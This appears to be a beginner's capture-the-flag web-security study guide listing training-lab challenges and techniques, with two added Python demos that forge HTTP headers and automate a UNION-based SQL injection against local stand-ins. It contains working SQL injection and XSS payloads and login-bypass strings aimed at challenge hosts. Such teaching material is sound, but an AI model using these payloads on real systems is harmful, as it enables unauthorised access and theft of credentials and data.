CTF Web Summary (Getting started)

Tags: http request, php code, sql injection

This article link: http://blog.csdn.net/u012763794/article/details/50959166

This article is based on my own experience and practice on the major training platforms and is updated continuously. If I have been lazy lately and have not updated it, please remind or encourage me in the comments below.

These are just my own notes, written for beginners who are just getting started; experts, please don't flame.

Basics
1. View Source code directly
http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php

2. Modify or add an HTTP request header
Common ones:
Referer: forge the request origin.
X-Forwarded-For: forge the client IP.
User-Agent: the browser (or whatever) the client claims to be.
http://lab1.xseclab.com/base6_6082c908819e105c378eb93b6631c4d3/index.php
Here you modify the .NET version in the User-Agent by appending one, e.g. .NET CLR 9.

Accept-Language: the language.
http://lab1.xseclab.com/base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php
http://ctf1.shiyanbar.com/basic/header/
Modify the cookie.
http://lab1.xseclab.com/base9_ab629d778e3a29540dfd60f2e548a5eb/index.php


3. View the HTTP request header or the response header
http://lab1.xseclab.com/base7_eb68bd2f0d762faf70c89799b3c1cc52/index.php
http://ctf1.shiyanbar.com/basic/catch/

4. A 302 redirect where the intermediate page carries the information
http://lab1.xseclab.com/base8_0abd63aa54bef0464289d6a42465f354/index.php
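Items 2 to 4 together, as an added example that is not code from the original article or from the challenge sites: a tiny local HTTP server stands in for a challenge page so the script runs offline, and its checks (which header values it wants) are constructed for the demo rather than taken from any real challenge. The client forges Referer, X-Forwarded-For, User-Agent (with a .NET version appended), Accept-Language and Cookie, and because http.client does not follow redirects, it gets to read the headers of the 302 itself, which a browser would skip straight past.

```python
"""Forging request headers and reading a 302's own headers.

Added example, not code from the original article or from the challenge
sites. A tiny local HTTP server stands in for the challenge pages so the
script runs offline; its checks (which header values it wants) are
constructed for the demo, not the real challenge logic.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed expectations standing in for the challenge's server-side checks.
EXPECTED = {
    "Referer": "http://www.google.com/",     # forged request origin
    "X-Forwarded-For": "1.1.1.1",            # forged client IP
    "Accept-Language": "zh-CN",              # forged browser language
    "Cookie": "Login=1",                     # modified cookie
}
UA_MARKER = ".NET CLR 9"                     # appended .NET version in User-Agent


class ChallengeHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        wrong = [h for h, v in EXPECTED.items() if self.headers.get(h) != v]
        if UA_MARKER not in self.headers.get("User-Agent", ""):
            wrong.append("User-Agent")
        if wrong:
            body = ("wrong or missing: " + ", ".join(wrong)).encode()
            self.send_response(403)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        # Item 4 above: the secret rides in the headers of the 302 itself.
        # A browser follows Location immediately and never shows you this.
        self.send_response(302)
        self.send_header("Location", "/index.php")
        self.send_header("X-Key", "constructed-key-value")  # constructed value
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *_):  # silence the default access log
        pass


def start_server():
    """Bind to an ephemeral port and serve in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), ChallengeHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(port, headers):
    """One GET with exactly these headers. http.client does not follow
    redirects, so the 302's status and headers come back untouched."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    try:
        conn.request("GET", "/index.php", headers=headers)
        resp = conn.getresponse()
        return resp.status, dict(resp.getheaders()), resp.read().decode()
    finally:
        conn.close()


FORGED = dict(EXPECTED)
FORGED["User-Agent"] = (
    "Mozilla/5.0 (Windows NT 6.1; Trident/5.0; .NET CLR 9.0)"  # version appended
)


def demo():
    """Returns (response without forged headers, response with them)."""
    server = start_server()
    try:
        return fetch(server.server_port, {}), fetch(server.server_port, FORGED)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    plain, forged = demo()
    print(plain[0], plain[2])
    print(forged[0], forged[1].get("Location"), forged[1].get("X-Key"))
```

The same thing against a real challenge is Burp's Repeater or curl with -H for each header and without -L, so the redirect is not followed; the point of using http.client here is exactly that it leaves the 302 alone.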

5. View the developer tools console
6. JavaScript code bypass
Bypass it by removing or modifying the code, or by altering the packets with a local proxy.
http://lab1.xseclab.com/base10_0b4e4866096913ac9c3a2272dde27215/index.php
7. Use Burp's Repeater to view the entire HTTP message
http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

8. Read the JavaScript code and compute the correct password directly in the console
http://ctf1.shiyanbar.com/basic/js/index.asp

9. robots.txt: get information from it. This file is meant to tell search engines what they may look at, so it very likely exposes the site's directory structure.
http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b/index.php

10. .bash_history: this one should be familiar; it records the commands a Linux user has entered.

Front-end scripting
JS encryption and decryption
http://ctf5.shiyanbar.com/DUTCTF/1.html // paste the code directly into the F12 console.

XSS
http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php
The challenge page itself is the vulnerability; just enter the following in the console:
$.post("./getkey.php?ok=1", {'URL': location.href, 'OK': ok}, function(data) { console.log(data); });
showkey();
Of course, the simple direct input also works:
<script>alert(HackingLab)</script>

This one is the same challenge:
http://lab1.xseclab.com/realxss2_bcedaba7e8618cdfb51178765060fc7d/index.php
Here you can enter jQuery directly on the challenge page, or use an HTML payload:
http://lab1.xseclab.com/realxss3_9b28b0ff93d0b0099f5ac7f8bad3f368/index.php


Back-end scripting
Code audits
ASP code audit:
1. http://ctf8.shiyanbar.com/aspaudit/
Length limit: in F12 delete the maxlength attribute or change its value; a local proxy also bypasses it.
// username: ' union select 1,1,1 from bdmin
Why three columns? A typical table has an id plus the account and password, so 3; if that fails, guess 4, and so on. Because the first half of the UNION (the lookup for the quoted, empty username) returns no rows, the final result set is only our 1,1,1, so entering 1 as the password logs you in.
Either way works; closing the quote explicitly: ' union select 1,1,1 from bdmin where '1'='1
PHP code audit:
1. http://ctf8.shiyanbar.com/phpaudit/ // in fact this is just modifying the X-Forwarded-For request header
2. http://ctf1.shiyanbar.com/web/4/index.php // same as the first back-end login type; read that one below first
3. http://ctf5.shiyanbar.com/dutctf/index.php // double URL encoding
4. http://ctf1.shiyanbar.com/web/5/index.php // see the second back-end login type
5. http://ctf4.shiyanbar.com/web/false.php // hashing an array: PHP's hash functions return NULL (with a warning) when handed an array, so two array parameters both hash to NULL and compare equal
6. http://ctf4.shiyanbar.com/web/session.php // only works on the first submission: you can submit password= directly, because on the first request the server has not yet set $_SESSION['password'], and since the check is a == comparison, the empty string and the unset (NULL) value are equal

Hidden form
http://ctf10.shiyanbar.com:8888/main.php

SQL injection
For the simple ones, go straight to a tool such as sqlmap and it's done (the "10 major SQL injection tools" lists are a good start).
1. http://ctf5.shiyanbar.com:8080/9/asp.asp

2. http://ctf5.shiyanbar.com/8/index.php?id=1 // of course it does not have to be id, other parameters work too; the following is just an example
Manual injection process:
// Determine the injection type (Boolean injection)
http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=1
http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2
// Determine the number of fields
http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%203
http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%202
// Get basic database information (CONCAT_WS is a string join function whose first argument is the delimiter; CHAR(58) is a colon, because the ASCII code of ':' is 58)
http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select%201,concat_ws(CHAR(58),user(),database(),version())
// Get the tables in the database; table_schema (a column of the MySQL system table information_schema.tables) can be understood as the database name. It is written here in hexadecimal (0x6d795f6462 decodes to my_db) and is the database name returned by the previous query
http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x6d795f6462
// Get the fields of the important table
http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,col
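The manual injection chain above, carried through end to end as an added example that is not code from the original article. An in-memory SQLite database stands in for the MySQL target so it runs offline: sqlite_master and pragma_table_info() replace information_schema.tables and information_schema.columns, sqlite_version() replaces version()/user()/database(), and '||' with char(58) replaces CONCAT_WS(CHAR(58), ...). The schema, table names and the flag value are constructed. It also generalises one step beyond the page: the column count is probed automatically with ORDER BY, and the parameterised query at the end shows why the same payload is harmless once id is bound instead of concatenated.

```python
"""Manual SQL injection walk-through against a constructed vulnerable query.

Added example, not code from the original article. An in-memory SQLite
database stands in for the MySQL target so it runs offline: sqlite_master
and pragma_table_info() replace information_schema.tables/columns, and
sqlite_version() replaces version()/user()/database(). The steps mirror the
page's ?id=1 and 1=2 union select ... chain, then show the parameterised fix.
"""
import sqlite3


def build_db():
    """Constructed target schema: a public table and the one we actually want."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'hello'), (2, 'world');
        CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'constructed-flag');
    """)
    return db


def vulnerable_query(db, id_param):
    """The bug: the id parameter is concatenated straight into the SQL."""
    return db.execute("SELECT id, title FROM news WHERE id=" + id_param).fetchall()


def safe_query(db, id_param):
    """The fix: a bound parameter; the payload is only ever a value, never SQL."""
    return db.execute("SELECT id, title FROM news WHERE id=?", (id_param,)).fetchall()


def is_injectable(db):
    """Step 1, boolean test: 'and 1=1' keeps the row, 'and 1=2' removes it."""
    return bool(vulnerable_query(db, "1 and 1=1")) and not vulnerable_query(db, "1 and 1=2")


def column_count(db, limit=10):
    """Step 2: ORDER BY n succeeds while n <= column count and errors after it."""
    for n in range(1, limit + 1):
        try:
            vulnerable_query(db, f"1 order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_select(db, cols, source=""):
    """Step 3: blank the real row with 1=2, then UNION our own SELECT in."""
    return vulnerable_query(db, f"1 and 1=2 union select {', '.join(cols)} {source}")


def mysql_hex(s):
    """The 0x... literal from the page: table_schema=0x6d795f6462 is 'my_db'."""
    return "0x" + s.encode().hex()


def walkthrough():
    db = build_db()
    ncols = column_count(db)  # 2, so every UNION below supplies exactly 2 columns
    # char(58) is ':' as in the page's CHAR(58); '||' is SQLite's string concat
    banner = union_select(db, ["1", "'v' || char(58) || sqlite_version()"])[0][1]
    tables = sorted(r[1] for r in union_select(
        db, ["1", "name"], "from sqlite_master where type='table'"))
    fields = sorted(r[1] for r in union_select(
        db, ["1", "name"], "from pragma_table_info('admin')"))
    creds = union_select(db, ["id", "username || char(58) || password"], "from admin")
    return {"injectable": is_injectable(db), "columns": ncols, "banner": banner,
            "tables": tables, "admin_fields": fields, "creds": creds}


if __name__ == "__main__":
    for key, value in walkthrough().items():
        print(key, value)
    print(mysql_hex("my_db"))
    print(safe_query(build_db(), "1 and 1=1"))  # the payload no longer changes the query
```

The ORDER BY probe stops at the first out-of-range error, which is exactly the "order by 3 fails, order by 2 works" observation on the page; the same loop is what a tool like sqlmap runs for you before it tries UNION payloads.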
